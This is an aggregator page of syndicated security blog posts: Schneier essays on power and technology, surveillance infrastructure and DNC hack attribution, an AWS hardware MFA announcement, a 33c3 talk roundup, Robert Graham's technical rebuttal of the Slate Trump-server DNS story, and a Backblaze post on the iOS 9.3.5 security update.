Technological advances change the world. That’s partly because of what they are, but even more because of the social changes they enable. New technologies upend power balances. They give groups new capabilities, increased effectiveness, and new defenses. The Internet decades have been a never-ending series of these upendings. We’ve seen existing industries fall and new industries rise. We’ve seen governments become more powerful in some areas and less in others. We’ve seen the rise of a new form of governance: a multi-stakeholder model where skilled individuals can have more power than multinational corporations or major governments.

Among the many power struggles, there is one type I want to particularly highlight: the battles between the nimble individuals who start using a new technology first, and the slower organizations that come along later.

In general, the unempowered are the first to benefit from new technologies: hackers, dissidents, marginalized groups, criminals, and so on. When they first encountered the Internet, it was transformative. Suddenly, they had access to technologies for dissemination, coordination, organization, and action — things that were impossibly hard before. This can be incredibly empowering. In the early decades of the Internet, we saw it in the rise of Usenet discussion forums and special-interest mailing lists, in how the Internet routed around censorship, and how Internet governance bypassed traditional government and corporate models. More recently, we saw it in the SOPA/PIPA debate of 2011-12, the Gezi protests in Turkey and the various “color” revolutions, and the rising use of crowdfunding. These technologies can invert power dynamics, even in the presence of government surveillance and censorship.

But that’s just half the story. Technology magnifies power in general, but the rates of adoption are different. Criminals, dissidents, the unorganized — all outliers — are more agile. They can make use of new technologies faster, and can magnify their collective power because of it. But when the already-powerful big institutions finally figured out how to use the Internet, they had more raw power to magnify.

This is true for both governments and corporations. We now know that governments all over the world are militarizing the Internet, using it for surveillance, censorship, and propaganda. Large corporations are using it to control what we can do and see, and the rise of winner-take-all distribution systems only exacerbates this.

This is the fundamental tension at the heart of the Internet, and information-based technology in general. The unempowered are more efficient at leveraging new technology, while the powerful have more raw power to leverage. These two trends lead to a battle between the quick and the strong: the quick who can make use of new power faster, and the strong who can make use of that same power more effectively.

This battle is playing out today in many different areas of information technology. You can see it in the security vs. surveillance battles between criminals and the FBI, or dissidents and the Chinese government. You can see it in the battles between content pirates and various media organizations. You can see it where social-media giants and Internet-commerce giants battle against new upstarts. You can see it in politics, where the newer Internet-aware organizations fight with the older, more established, political organizations. You can even see it in warfare, where a small cadre of military personnel can keep a country under perpetual bombardment — using drones — with no risk to the attackers.

This battle is fundamental to Cory Doctorow’s new novel Walkaway. Our heroes represent the quick: those who have checked out of traditional society, and thrive because easy access to 3D printers enables them to eschew traditional notions of property. Their enemy is the strong: the traditional government institutions that exert their power mostly because they can. This battle rages through most of the book, as the quick embrace ever-new technologies and the strong struggle to catch up.

It’s easy to root for the quick, both in Doctorow’s book and in the real world. And while I’m not going to give away Doctorow’s ending — and I don’t know enough to predict how it will play out in the real world — right now, trends favor the strong.

Centralized infrastructure favors traditional power, and the Internet is becoming more centralized. This is true at the endpoints, where companies like Facebook, Apple, Google, and Amazon control much of how we interact with information. It’s also true in the middle, where companies like Comcast increasingly control how information gets to us. It’s true in countries like Russia and China that increasingly legislate their own national agenda onto their pieces of the Internet. And it’s even true in countries like the US and the UK, which increasingly legislate more government surveillance capabilities.

At the 1996 World Economic Forum, cyber-libertarian John Perry Barlow issued his “Declaration of the Independence of Cyberspace,” telling the assembled world leaders and titans of industry: “You have no moral right to rule us, nor do you possess any methods of enforcement that we have true reason to fear.” Many of us believed him a scant 20 years ago, but today those words ring hollow.

But if history is any guide, these things are cyclic. In another 20 years, even newer technologies — both the ones Doctorow focuses on and the ones no one can predict — could easily tip the balance back in favor of the quick. Whether that will result in more of a utopia or a dystopia depends partly on these technologies, but even more on the social changes resulting from these technologies. I’m short-term pessimistic but long-term optimistic.

This essay previously appeared on Crooked Timber.

Announcing the Availability of Hardware Multi-Factor Authentication in the AWS GovCloud (US) Region

Post Syndicated from Craig Liebendorfer original https://aws.amazon.com/blogs/security/announcing-the-availability-of-hardware-multi-factor-authentication-in-the-aws-govcloud-us-region/

Hardware multi-factor authentication (MFA) is now available in the AWS GovCloud (US) Region to help strengthen data security while giving you control over token keys that have access to your data. MFA is a best practice that adds an extra layer of protection on top of users’ user names and passwords.

These token keys that are specific to the AWS GovCloud (US) Region are distributed by SurePassID, a third-party digital security company, and implement the Initiative for Open Authentication Time-Based One-Time Password (OATH TOTP) standard. SurePassID tokens are available for purchase on Amazon.com.
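
For reference, the OATH TOTP algorithm such tokens implement (RFC 6238, built on the RFC 4226 HOTP construction) is compact enough to sketch in Python; the base32 secret below is a made-up demo value:

    # RFC 6238 TOTP: HMAC-SHA1 over the 30-second time counter, then
    # dynamic truncation down to a 6-digit code.
    import base64, hashlib, hmac, struct, time

    def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
        key = base64.b32decode(secret_b32)
        counter = struct.pack(">Q", int(time.time()) // period)
        mac = hmac.new(key, counter, hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    print(totp("JBSWY3DPEHPK3PXP"))  # demo secret; a new code every 30 seconds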

For more information about hardware MFA in the AWS GovCloud (US) Region, see the AWS Public Sector Blog post.

– Craig

Surveillance and our Insecure Infrastructure

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/04/surveillance_an_2.html

Since Edward Snowden revealed to the world the extent of the NSA’s global surveillance network, there has been a vigorous debate in the technological community about what its limits should be.

Less discussed is how many of these same surveillance techniques are used by other — smaller, poorer, and more totalitarian — countries to spy on political opponents, dissidents, human rights defenders, and the press; Citizen Lab in Toronto has documented some of the many abuses, by countries like Ethiopia, the UAE, Iran, Syria, Kazakhstan, Sudan, Ecuador, Malaysia, and China.

That these countries can use network surveillance technologies to violate human rights is a shame on the world, and there’s a lot of blame to go around.

We can point to the governments that are using surveillance against their own citizens.

We can certainly blame the cyberweapons arms manufacturers that are selling those systems, and the countries — mostly European — that allow those arms manufacturers to sell those systems.

There’s a lot more the global Internet community could do to limit the availability of sophisticated Internet and telephony surveillance equipment to totalitarian governments. But I want to focus on another contributing cause to this problem: the fundamental insecurity of our digital systems that makes this a problem in the first place.

IMSI catchers are fake mobile phone towers. They allow someone to impersonate a cell network and collect information about phones in the vicinity of the device, and they’re used to create lists of people who were at a particular event or near a particular location.

Fundamentally, the technology works because the phone in your pocket automatically trusts any cell tower to which it connects. There’s no security in the connection protocols between the phones and the towers.

IP intercept systems are used to eavesdrop on what people do on the Internet. Unlike the surveillance that happens at the sites you visit, by companies like Facebook and Google, this surveillance happens at the point where your computer connects to the Internet. Here, someone can eavesdrop on everything you do.

This system also exploits existing vulnerabilities in the underlying Internet communications protocols. Most of the traffic between your computer and the Internet is unencrypted, and what is encrypted is often vulnerable to man-in-the-middle attacks because of insecurities in both the Internet protocols and the encryption protocols that protect it.

There are many other examples. What they all have in common is that they are vulnerabilities in our underlying digital communications systems that allow someone — whether it’s a country’s secret police, a rival national intelligence organization, or a criminal group — to break or bypass what security there is and spy on the users of these systems.

These insecurities exist for two reasons. First, they were designed in an era where computer hardware was expensive and inaccessibility was a reasonable proxy for security. When the mobile phone network was designed, faking a cell tower was an incredibly difficult technical exercise, and it was reasonable to assume that only legitimate cell providers would go to the effort of creating such towers.

At the same time, computers were less powerful and software was much slower, so adding security into the system seemed like a waste of resources. Fast forward to today: computers are cheap and software is fast, and what was impossible only a few decades ago is now easy.

The second reason is that governments use these surveillance capabilities for their own purposes. The FBI has used IMSI-catchers for years to investigate crimes. The NSA uses IP interception systems to collect foreign intelligence. Both of these agencies, as well as their counterparts in other countries, have put pressure on the standards bodies that create these systems to not implement strong security.

Of course, technology isn’t static. With time, things become cheaper and easier. What was once a secret NSA interception program or a secret FBI investigative tool becomes usable by less-capable governments and cybercriminals.

Man-in-the-middle attacks against Internet connections are a common criminal tool to steal credentials from users and hack their accounts.

IMSI-catchers are used by criminals, too. Right now, you can go onto Alibaba.com and buy your own IMSI catcher for under $2,000.

Despite their uses by democratic governments for legitimate purposes, our security would be much better served by fixing these vulnerabilities in our infrastructures.

These systems are not only used by dissidents in totalitarian countries, they’re also used by legislators, corporate executives, critical infrastructure providers, and many others in the US and elsewhere.

That we allow people to remain insecure and vulnerable is both wrongheaded and dangerous.

Earlier this month, two American legislators — Senator Ron Wyden and Rep Ted Lieu — sent a letter to the chairman of the Federal Communications Commission, demanding that he do something about the country’s insecure telecommunications infrastructure.

They pointed out that not only are insecurities rampant in the underlying protocols and systems of the telecommunications infrastructure, but also that the FCC knows about these vulnerabilities and isn’t doing anything to force the telcos to fix them.

Wyden and Lieu make the point that fixing these vulnerabilities is a matter of US national security, but it’s also a matter of international human rights. All modern communications technologies are global, and anything the US does to improve its own security will also improve security worldwide.

Yes, it means that the FBI and the NSA will have a harder job spying, but it also means that the world will be a safer and more secure place.

This essay previously appeared on AlJazeera.com.

Attributing the DNC Hacks to Russia

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/01/attributing_the_1.html

President Barack Obama’s public accusation of Russia as the source of the hacks in the US presidential election and the leaking of sensitive e-mails through WikiLeaks and other sources has opened up a debate on what constitutes sufficient evidence to attribute an attack in cyberspace. The answer is both complicated and inherently tied up in political considerations.

The administration is balancing political considerations and the inherent secrecy of electronic espionage with the need to justify its actions to the public. These issues will continue to plague us as more international conflict plays out in cyberspace.

It’s true that it’s easy for an attacker to hide who he is in cyberspace. We are unable to positively identify particular pieces of hardware and software around the world. We can’t verify the identity of someone sitting in front of a keyboard through computer data alone. Internet data packets don’t come with return addresses, and it’s easy for attackers to disguise their origins. For decades, hackers have used techniques such as jump hosts, VPNs, Tor and open relays to obscure their origin, and in many cases they work. I’m sure that many national intelligence agencies route their attacks through China, simply because everyone knows lots of attacks come from China.

On the other hand, there are techniques that can identify attackers with varying degrees of precision. It’s rarely just one thing, and you’ll often hear the term “constellation of evidence” to describe how a particular attacker is identified. It’s analogous to traditional detective work. Investigators collect clues and piece them together with known modes of operation. They look for elements that resemble other attacks and elements that are anomalies. The clues might involve ones and zeros, but the techniques go back to Sir Arthur Conan Doyle.

The University of Toronto-based organization Citizen Lab routinely attributes attacks against the computers of activists and dissidents to particular Third World governments. It took months to identify China as the source of the 2012 attacks against the New York Times. While it was uncontroversial to say that Russia was the source of a cyberattack against Estonia in 2007, no one knew if those attacks were authorized by the Russian government — until the attackers explained themselves. And it was the Internet security company CrowdStrike that first attributed the attacks against the Democratic National Committee to Russian intelligence agencies in June, based on multiple pieces of evidence gathered from its forensic investigation.

Attribution is easier if you are monitoring broad swaths of the Internet. This gives the National Security Agency a singular advantage in the attribution game. The problem, of course, is that the NSA doesn’t want to publish what it knows.

Regardless of what the government knows and how it knows it, the decision of whether to make attribution evidence public is another matter. When Sony was attacked, many security experts — myself included — were skeptical of both the government’s attribution claims and the flimsy evidence associated with it. I only became convinced when the New York Times ran a story about the government’s attribution, which talked about both secret evidence inside the NSA and human intelligence assets inside North Korea. In contrast, when the Office of Personnel Management was breached in 2015, the US government decided not to accuse China publicly, either because it didn’t want to escalate the political situation or because it didn’t want to reveal any secret evidence.

The Obama administration has been more public about its evidence in the DNC case, but it has not been entirely public.

It’s one thing for the government to know who attacked it. It’s quite another for it to convince the public who attacked it. As attribution increasingly relies on secret evidence — as it did with North Korea’s attack of Sony in 2014 and almost certainly does regarding Russia and the previous election — the government is going to have to face the choice of making previously secret evidence public and burning sources and methods, or keeping it secret and facing perfectly reasonable skepticism.

If the government is going to take public action against a cyberattack, it needs to make its evidence public. But releasing secret evidence might get people killed, and it would make any future confidentiality assurances we make to human sources completely non-credible. This problem isn’t going away; secrecy helps the intelligence community, but it wounds our democracy.

The constellation of evidence attributing the attacks against the DNC, and the subsequent release of information, is comprehensive. It’s possible that there was more than one attack. It’s possible that someone not associated with Russia leaked the information to WikiLeaks, although we have no idea where that person would have obtained the information. We know that the Russian actors who hacked the DNC — both the FSB, Russia’s principal security agency, and the GRU, Russia’s military intelligence unit — are also attacking other political networks around the world.

In the end, though, attribution comes down to whom you believe. When Citizen Lab writes a report outlining how a United Arab Emirates human rights defender was targeted with a cyberattack, we have no trouble believing that it was the UAE government. When Google identifies China as the source of attacks against Gmail users, we believe it just as easily.

Obama decided not to make the accusation public before the election so as not to be seen as influencing the election. Now, afterward, there are political implications in accepting that Russia hacked the DNC in an attempt to influence the US presidential election. But no amount of evidence can convince the unconvinceable.

The most important thing we can do right now is deter any country from trying this sort of thing in the future, and the political nature of the issue makes that harder. Right now, we’ve told the world that others can get away with manipulating our election process as long as they can keep their efforts secret until after one side wins. Obama has promised both secret retaliations and public ones. We need to hope they’re enough.

This essay previously appeared on CNN.com.

EDITED TO ADD: The ODNI released a declassified report on the Russian attacks. Here’s a New York Times article on the report.

And last week there were Senate hearings on this issue.

EDITED TO ADD: A Washington Post article talks about some of the intelligence behind the assessment.

EDITED TO ADD (1/10): The UK connection.

2016-12-29 33c3 – a few talks

Post Syndicated from Vasil Kolev original https://vasil.ludost.net/blog/?p=3332

This year I’m watching 33c3 from home, and I seem to be watching fewer talks. Here’s what I’ve seen so far
(the processed talks are on media.ccc.de; the ones not there yet can be found on relive):

What could possibly go wrong with <insert x86 instruction here>? was a description, with demo code, of how the cache can be used (by flushing it, filling it, and so on) to communicate between unconnected processes or even virtual machines that get scheduled on the same processor (including between cores that share a cache).

How Do I Crack Satellite and Cable Pay TV? was about reverse engineering the chips that decrypt satellite TV; reasonably interesting.

Building a high throughput low-latency PCIe based SDR is by people developing a software-defined radio on a mini PCIe card, which could be used for all sorts of more serious purposes (it even has clock synchronization from GPS). For the moment they are about halfway there (they haven’t yet hit their throughput target for the device), and if they reach a decent price, this could turn out to be the ideal device for software GSM/LTE work.

Shut Up and Take My Money! was about how they broke some company’s mobile app that handles consumer transactions. It sounded like the people who designed/wrote it should be locked up.

What’s It Doing Now? was a rather interesting talk about autopilots in airplanes, how this kind of automation has to be watched carefully, and in general how things are not as automagical as we would like. Talks about aviation problems are always interesting 🙂

Nintendo Hacking 2016 described what has been broken on the various Nintendo devices: boot loader exploits and all that sort of thing. This was one of the talks that mentioned the glitching technique – feeding a lower voltage for a moment so that a given instruction gets smeared, with a chance of JMP-ing into our code at some point, letting us dump something.

Where in the World Is Carmen Sandiego? was a talk about breaking the reservation systems for airline tickets and travel in general. Rather sad – they said at the start that there isn’t much hacking in the talk, because things are too broken and too easy to attack. A short tip: don’t post a photo of your boarding pass.

You can -j REJECT but you can not hide: Global scanning of the IPv6 Internet is a DNS-based technique for relatively easy scanning of all existing IPv6 DNS PTR records, in order to find most existing servers. Quite clever, and I’ll probably test it somewhere 🙂

Tapping into the core describes an interesting device for debugging/snooping on Intel processors over USB and probably also over the network, i.e. a debugger that can touch the processor directly. It sounds very promising (the talk looked at it mainly as a way of building rootkits).

Recount 2016: An Uninvited Security Audit of the U.S. Presidential Election was a lot of empty talk about the US election, about the recount in which no problem was found, and in general about their broken system.

The Untold Story of Edward Snowden’s Escape from Hong Kong told the story of Edward Snowden’s two weeks in Hong Kong and the refugees who hid him before he flew out, together with a call for a fundraiser for them.

State of Internet Censorship 2016 was the usual overview, together with the projects through which it is studied. The bottom line was that censorship is now legalized almost everywhere it happens, and it is becoming ever more common for a country to shut off its Internet for a while around certain events.

Million Dollar Dissidents and the Rest of Us described the targeted methods various governments use (and who sells and teaches them those methods) for hacking and extracting data from all kinds of devices belonging to people those governments find inconvenient. The capabilities are fairly advanced, and it is increasingly clear that most of our software is unfit for secure activities.

On Smart Cities, Smart Energy, And Dumb Security was about how broken the “smart” electricity meters are, and how nobody pays serious attention to the security of these things.

Dissecting modern (3G/4G) cellular modems was an interesting description of existing hardware that can be used as a 3G/4G modem (one that is even used in one of the iPhones), which in the end turned out to run Android/Linux inside (i.e. you could safely say that the iPhone 6 (if I’m not mistaken) contains a Linux/Android system).

In the coming days I’ll catch up on some more from the recordings, plus whatever remains tomorrow, and I’ll write again. I really want to watch most of the talks about random number generators and the talk about HDMI.

In which I have to debunk a second time

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html

So Slate is doubling-down on their discredited story of a secret Trump server. Tip for journalists: if you are going to argue against an expert debunking your story, try to contact that expert first, so they don’t have to do what I’m going to do here, showing obvious flaws. Also, pay attention to the data.

The experts didn’t find anything

The story claims:

“I spoke with many DNS experts. They found the evidence strongly suggestive of a relationship between the Trump Organization and the bank”.

No, he didn’t. He gave experts limited information and asked them whether it’s consistent with a conspiracy theory. He didn’t ask if it was “suggestive” of the conspiracy theory, or whether this was the best theory that fit the data.

This is why “experts” quoted in the press need to go through “media training”, to avoid having their reputations harmed by bad journalists who try their best to put words in their mouths. Such training teaches you to recognize bad journalists like this, and how not to get sucked into their fabrications.

Jean Camp isn’t an expert

On the other hand, Jean Camp isn’t an expert. I’ve never heard of her before. She gets details wrong. Take, for example, this blogpost, where she discusses lookups for the domain mail.trump-email.com.moscow.alfaintra.net. She says:

This query is unusual in that is merges two hostnames into one. It makes the most sense as a human error in inserting a new hostname in some dialog window, but neglected to hit the backspace to delete the old hostname.

Uh, no. It’s normal DNS behavior with non-FQDNs. If the lookup for a name fails, computers will try again, pasting the local domain on the end. In other words, when Twitter’s DNS was taken offline by the DDoS attack a couple weeks ago, those monitoring DNS saw a zillion lookups for names like “www.twitter.com.example.com”.

I’ve reproduced this on my desktop by configuring the suffix moscow.alfaintra.net.

I then pinged “mail1.trump-email.com” and captured the packets. As you can see, after the initial lookups fail, Windows tried appending the suffix.
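
The retry logic is easy to model. Here’s a minimal Python sketch of a stub resolver’s search-list behavior (the lookup callable and the KeyError-for-NXDOMAIN convention are stand-ins, not real resolver internals):

    # Minimal sketch of DNS search-list behavior; `lookup` is a stand-in
    # for a resolver call that raises KeyError on NXDOMAIN.
    SEARCH_SUFFIX = "moscow.alfaintra.net"

    def resolve(name, lookup):
        if name.endswith("."):
            return lookup(name)    # trailing dot = fully qualified, no retry
        try:
            return lookup(name)    # first, try the name exactly as given
        except KeyError:
            # On failure, retry with the local search suffix appended. This
            # is how "mail1.trump-email.com.moscow.alfaintra.net" queries
            # appear in passive DNS data without any human typo involved.
            return lookup(name + "." + SEARCH_SUFFIX)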

I don’t know what Jean Camp is an expert of, but this is sorta a basic DNS concept. It’s surprising she’d get it wrong. Of course, she may be an expert in DNS who simply had a brain fart (this happens to all of us), but looking across her posts and tweets, she doesn’t seem to be somebody who has a lot of experience with DNS. Sorry for impugning her credibility, but that’s the way the story is written. It demands that we trust the quoted “experts”.

Call up your own IT department at Slate. Ask your IT nerds if this is how DNS operates. Note: I’m saying your average, unremarkable IT nerds can debunk an “expert” you quote in your story.

Understanding “spam” and “blacklists”

The new article has a paragraph noting that the IP address doesn’t appear on spam blocklists:

Was the server sending spam—unsolicited mail—as opposed to legitimate commercial marketing? There are databases that assiduously and comprehensively catalog spam. I entered the internet protocol address for mail1.trump-email.com to check if it ever showed up in Spamhaus and DNSBL.info. There were no traces of the IP address ever delivering spam.

This is a profound misunderstanding of how these things work.

Colloquially, we call those sending mass marketing emails, like Cendyn, “spammers”. But those running blocklists have a narrower definition. If emails contain an option to “opt-out” of future emails, then it’s technically not “spam”.

Cendyn is constantly getting added to blocklists when people complain. They spend considerable effort contacting the many organizations maintaining blocklists, proving they do “opt-outs”, and getting “white-listed” instead of “black-listed”. Indeed, the entire spam-blacklisting industry is a bit of a scam — getting white-listed often involves a bit of cash.

Blacklist records only go back a few months. The article is in error saying there’s no record ever of Cendyn sending spam. Instead, if an address comes up clean, it means there’s no record for the past few months. And, if Cendyn is in the white-lists, there would be no record of “spam” at all, anyway.

As somebody who frequently scans the entire Internet, I’m constantly getting on/off blacklists. It’s a real pain. At the moment, my scanner address “209.126.230.71” doesn’t appear to be on any blacklists. Next time a scan kicks off, it’ll probably get added — but only by a few, because most have white-listed it.
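
If you want to run the same check yourself, a DNSBL lookup is just a DNS query: reverse the IP’s octets and append the list’s zone. A minimal Python sketch, assuming the standard zen.spamhaus.org zone (a listed address returns an A record; NXDOMAIN means not currently listed):

    import socket

    def on_dnsbl(ip, zone="zen.spamhaus.org"):
        """True if `ip` is listed on the DNSBL *right now*; a clean
        answer says nothing about listings from months ago."""
        query = ".".join(reversed(ip.split("."))) + "." + zone
        try:
            socket.gethostbyname(query)   # any A record means "listed"
            return True
        except socket.gaierror:           # NXDOMAIN means "not listed"
            return False

    print(on_dnsbl("209.126.230.71"))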

There is no IP address limitation

The story repeats the theory, which I already debunked, that the server has a weird configuration that limits who can talk to it:

The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.”

No, that’s how Listrak (who is the one who actually controls the server) configures all their marketing servers. Anybody can confirm this themselves by pinging all the servers in this range:
In case you don’t want to do scans yourself, you can look it up on Shodan and see that there are at least 4000 servers around the Internet that give the same error message.
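
Verifying the banner needs nothing fancier than a raw socket read. A Python sketch (the hostname below is a placeholder; substitute any server from the range in question):

    import socket

    def smtp_greeting(host, port=25, timeout=5):
        """Read the server's opening SMTP line; these marketing MTAs
        answer every client with a 521 rejection banner."""
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(512).decode(errors="replace").strip()

    print(smtp_greeting("mail1.example.net"))   # placeholder host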

Again, go back to Chris Davis from your original story and ask him about this. He’ll confirm that there’s nothing nefarious or weird going on here, that it’s just how Listrak has decided to configure all its spam-sending engines.

Either this conspiracy goes much deeper, with hundreds of servers involved, or this is a meaningless datapoint.

Where did the DNS logs come from?

Tea Leaves and Jean Camp are showing logs of private communications. Where did these logs come from? This information isn’t public. It means somebody has done something like hack into Alfa Bank. Or it means researchers who monitor DNS (for maintaining DNS, and for doing malware research) have broken their NDAs and possibly the law.

The data is incomplete and inconsistent. Those who work for other companies, like Dyn, claim it doesn’t match their own data. We have good reason to doubt these logs. There’s a good chance that the source doesn’t have as comprehensive a view as “Tea Leaves” claim. There’s also a good chance the data has been manipulated.

Specifically, I have a source who claims records for trump-email.com were changed in June, meaning either my source or Tea Leaves is lying.

Until we know more about the source of the data, it’s impossible to believe the conclusions that only Alfa Bank was doing DNS lookups.

By the way, if you are a company like Alfa Bank, and you don’t want the “research” community to see leaked intranet DNS requests, then you should probably reconfigure your DNS resolvers. You’ll want to look into RFC 7816 “query minimization”, supported by the Unbound and Knot resolvers.
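
In Unbound, for example, that’s a one-line setting; a sketch of the relevant server-block option in unbound.conf (available since Unbound 1.5.7):

    server:
        # Send upstream only as many labels of the query name as each
        # zone needs (RFC 7816), so internal hostnames leak less context.
        qname-minimisation: yes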

Do the graphs show interesting things?

The original “Tea Leaves” researchers are clearly acting in bad faith. They are trying to twist the data to match their conclusions. For example, in the original article, they claim that peaks in the DNS activity match campaign events. But looking at the graph, it’s clear these are unrelated. It displays the common cognitive bias of seeing patterns that aren’t there.

Likewise, they claim that the timing throughout the day matches what you’d expect from humans interacting back and forth between Moscow and New York. No. This is what the activity looks like, graphing the number of queries by hour:

As you can see, there’s no pattern. When workers go home at 5pm in New York City, it’s midnight in Moscow. If humans were involved, you’d expect an eight-hour lull during that time. Likewise, when workers arrive at 9am in New York City, you’d expect a spike in traffic for about an hour until workers in Moscow go home. You see none of that here. What you instead see is a random distribution throughout the day — the sort of distribution you’d expect if this were DNS lookups from incoming spam.

The point is that we know the original “Tea Leaves” researchers aren’t trustworthy, that they’ve convinced themselves of things that just aren’t there.
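
Anyone with the raw timestamps can redo the hour-of-day check above. A minimal Python sketch, assuming the timestamps are UTC epoch seconds:

    from collections import Counter
    from datetime import datetime, timezone

    def hourly_histogram(timestamps):
        """Print an hour-of-day histogram. Office-hours traffic between
        New York and Moscow should show an overnight lull; spam-driven
        lookups arrive roughly uniformly around the clock."""
        hours = Counter(
            datetime.fromtimestamp(ts, timezone.utc).hour for ts in timestamps
        )
        for hour in range(24):
            print(f"{hour:02d}:00 {'#' * hours.get(hour, 0)}")
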
Does Trump control the server in question?

OMG, this post asks the question, after I’ve debunked the original story, and still gets the answer wrong.

The answer is that Listrak controls the server. Not even Cendyn controls it, really; they just contract services from Listrak. In other words, not only does Trump not control it, the next-level company (Cendyn) doesn’t control it either.

Does Trump control the domain in question?

OMG, this new story continues to make the claim that the Trump Organization controls the domain trump-email.com, despite my debunking showing that Cendyn controls the domain.

Look at the WHOIS info yourself. All the contact info goes to Cendyn. It fits the pattern Cendyn chooses for their campaigns:
  • trump-email.com
  • mjh-email.com
  • denihan-email.com
  • hyatt-email.com
Cendyn even spells “Trump Orgainzation” wrong.
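
Pulling the record takes one TCP connection; a minimal Python sketch of a raw WHOIS query (whois.verisign-grs.com is the registry WHOIS server for .com):

    import socket

    def whois(domain, server="whois.verisign-grs.com"):
        """Raw WHOIS over TCP/43; the response names the registrar and
        points at the full contact record."""
        with socket.create_connection((server, 43), timeout=10) as s:
            s.sendall(domain.encode() + b"\r\n")
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode(errors="replace")

    print(whois("trump-email.com"))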

There’s a difference between a “server” and a “name”

The article continues to make trivial technical errors, like confusing what a server is with what a domain name is. For example:

One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank

The server has never been shut down. Instead, the name “mail1.trump-email.com” was removed from Cendyn’s DNS servers.

It’s impossible to debunk everything in these stories because they garble the technical details so much that it’s impossible to know what the heck they are claiming.
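
The name-versus-server distinction is easy to check yourself: an A record can vanish from DNS while the machine behind it keeps running. A Python sketch:

    import socket

    # A hostname disappearing from DNS is not a server shutting down:
    # the A record can be deleted while the machine keeps answering
    # on its IP address.
    try:
        print(socket.gethostbyname("mail1.trump-email.com"))
    except socket.gaierror:
        print("name no longer resolves -- says nothing about the server")
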
Why did Cendyn change things after Alfa Bank was notified?

It’s a curious coincidence that Cendyn changed their DNS records a couple days after the NYTimes contacted Alfa Bank.

But “coincidence” is all it is. I have years of experience with investigating data breaches. I know that such coincidences abound. There are always weird coincidences that you are certain are meaningful, but which by the end of the investigation just aren’t.

The biggest source of coincidences is that IT is always changing things and always messing things up. It’s the nature of IT. Thus, you’ll always see a change in IT that matches some other event. Those looking for conspiracies ignore the changes that don’t match, and focus on the one that does, so it looms suspiciously.

As I’ve mentioned before, I have a source that says Cendyn changed things around in June. This makes me believe that “Tea Leaves” is selectively highlighting the change in September.

In any event, many people have noticed that the registrar email “Emily McMullin” has the same last name as Evan McMullin, running against Trump in Utah. This supports my point: when you do hacking investigations, you find irrelevant connections all over the freakin’ place.
“Experts stand by their analysis”

This new article states:

I’ve checked back with eight of the nine computer scientists and engineers I consulted for my original story, and they all stood by their fundamental analysis

Well, of course, they don’t want to look like idiots. But notice the subtle rephrasing of the question: the experts stand by their analysis. It doesn’t mean the same thing as standing behind the reporter’s analysis. The experts made narrow judgements, which even I stand behind as mostly correct, given the data they were given at the time. None of them were asked whether the entire conspiracy theory holds up.
What you should ask is people like Chris Davis or Paul Vixie whether they stand behind my analysis in the past two posts. Or really, ask any expert. I’ve documented things in sufficient clarity. For example, go back to Chris Davis and ask him again about the “limited IP address” theory, and whether it holds up against my scan of that data center above.
Conclusion

Other major news outlets all passed on the story, because even non-experts know it’s flawed. The data means nothing. The Slate journalist nonetheless went forward with the story, tricking experts, and finding some non-experts.

But as I’ve shown, given a complete technical analysis, the story falls apart. Most of what’s strange is perfectly normal. The data itself (the DNS logs) is untrustworthy. It treats unknown things (like how the mail server rejects IP addresses) as “unknowable” things that confirm the conspiracy, when they are in fact simply things unknown at the current time, which can become knowable with a little research.

What I show in my first post, and this post, is more data. This data shows context. This data explains the unknowns that Slate present. Moreover, you don’t have to trust me — anybody can replicate my work and see for themselves.


iOS 9.3.5 Fixes Malware Exploit: Install It, but Backup First!

Post Syndicated from Peter Cohen original https://www.backblaze.com/blog/install-ios-935-backup-first/

Update your iPhone or iPad

Apple this week posted an important update to iOS 9. Version 9.3.5 is ready for download from Apple’s servers. Experts advise you to upgrade right away, since it closes a malware security vulnerability. It’s good advice, even if the risk is small to most of us. Make sure to back up your iPhone or iPad first, though. Here’s info on what’s going on and how to protect yourself.

First of all, if there’s one takeaway from the story: Don’t click on a link unless you know what’s inside.

A human rights dissident named Ahmed Mansoor received a strange text message on his iPhone encouraging him to click a link. He didn’t. Instead Mansoor reported it to a security research firm. Researchers think that it was a sophisticated effort to take over Mansoor’s iPhone. The code belongs to a company that makes government spyware.

The security group alerted Apple and didn’t publicize the break until after Apple issued the patch.

What is a zero-day exploit?

The original report says that hackers have combined “zero-day” exploits in iOS to remotely jailbreak a targeted iPhone. “Zero-day” is security shorthand for “this problem hadn’t been patched by the software maker when it was found.” (“Jailbreaking” enables software to be installed on the iPhone that Apple doesn’t allow otherwise.)

The folks at Macworld have the skinny on what’s going on here:

When used together, the exploits allow someone to hijack an iOS device and control or monitor it remotely. Hijackers would have access to the device’s camera and microphone, and could capture audio calls even in otherwise end-to-end secured apps like WhatsApp. They could also grab stored images, track movements, and retrieve files.

It’s important to understand that according to the security experts who have examined the code, this particular exploit was targeted to be delivered to a specific person. It was only his general awareness and suspicion something was wrong that prevented the software from getting installed.

In other words, this isn’t like a phishing or a botnet scheme, where the goal is to get as many devices infected as possible. Instead, this was an effort by government actors to target a specific individual.

That means the risk that you might be exploited by this particular problem is relatively low, unless you’re in the crosshairs of a government agency (or unless malware programmers figure out another way to use this particular threat for other purposes).

Risk, low. So don’t panic. But the threat is still there, which is why Apple’s pushed the 9.3.5 update and is recommending that everyone who’s running iOS 9 install it promptly.

Should I back up before I update?

Yes! Back up before you make any fundamental changes to your device. It’s a good idea to make sure any essential information is stored safely somewhere else.

You can back up your device using iTunes on the Mac or PC. Use the Lightning cable that came with your iOS device and connect it to an open USB port, then open iTunes to back up. You can also use iCloud Backup, Apple’s cloud-based backup service. Here’s a guide to backing up your iPhone or iPad with more details.

